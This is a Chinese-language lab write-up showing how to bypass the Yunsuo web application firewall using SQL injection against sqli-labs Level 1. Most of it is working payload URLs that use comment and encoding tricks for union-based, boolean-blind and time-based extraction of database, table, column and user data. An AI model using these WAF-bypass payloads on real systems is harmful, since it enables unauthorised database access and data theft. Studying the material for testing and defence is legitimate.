云锁最新版SQL注入WAF绕过

作者：ghtwf01@星盟安全团队

前言

这里使用sqli-labs第一关字符型注入来测试

绕过and 1=1

直接使用and 1=1肯定会被拦截

使用%26%26即可代替and绕过，1=1可以用True表示，1=2可以用False表示

绕过order by

直接使用order by被拦截

使用order/*!60000ghtwf01*/by绕过

绕过union select

和order by一样绕过姿势，使用union/*!60000ghtwf01*/select绕过

查询数据库名

过滤了group_concat()，限制了select与from的结合，from.无法绕过，使用/*!00000select*/绕过

http://192.168.0.7/sqli/Less-1/?id=0%27%20union/*!60000ghtwf01*//*!00000select*/%201,2,schema_name%20from%20information_schema.schemata%20limit%200,1--+

查询表名

http://192.168.0.7/sqli/Less-1/?id=0%27%20union/*!60000ghtwf01*//*!00000select*/%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%200,1--+

查询列名

and用%26%26代替

查询字段

盲注

布尔盲注

查询数据库名长度

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20length(database/**/())=8%20--+

查询第一个数据库名第一个字母
ascii()、hex()均未被过滤，限制select与from的结合，使用/*!00000select*/

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(ascii(substr((/*!00000select*/%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=105)%20--+

查询security数据库第一个表名第一个字母

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%200,1),1,1))=65)%20--+

查询users表第一个列名第一个字母

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20column_name%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20%26%26%20table_name=0x7573657273%20limit%200,1),1,1))=69)%20--+

查询字段

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20username%20from%20users%20limit%200,1),1,1))=44)%20--+

时间盲注

过滤了sleep()函数，使用benchmark()函数即可，查询规则参考上面布尔盲注